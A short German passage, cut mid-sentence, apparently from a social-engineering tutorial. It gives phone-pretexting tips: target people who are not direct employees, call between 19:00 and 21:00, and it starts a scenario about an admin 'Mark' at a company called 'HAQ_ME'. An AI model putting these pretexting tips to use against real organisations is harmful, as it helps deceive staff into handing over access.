(KEIN Sexismus, reine Erfahrung :) )
keine direkten Mitarbeiter der Firma
abends anrufen (zw. 19.00 und 21.00)
... so, nehmen wir mal an, dass der Admin der Firma HAQ_ME "Mark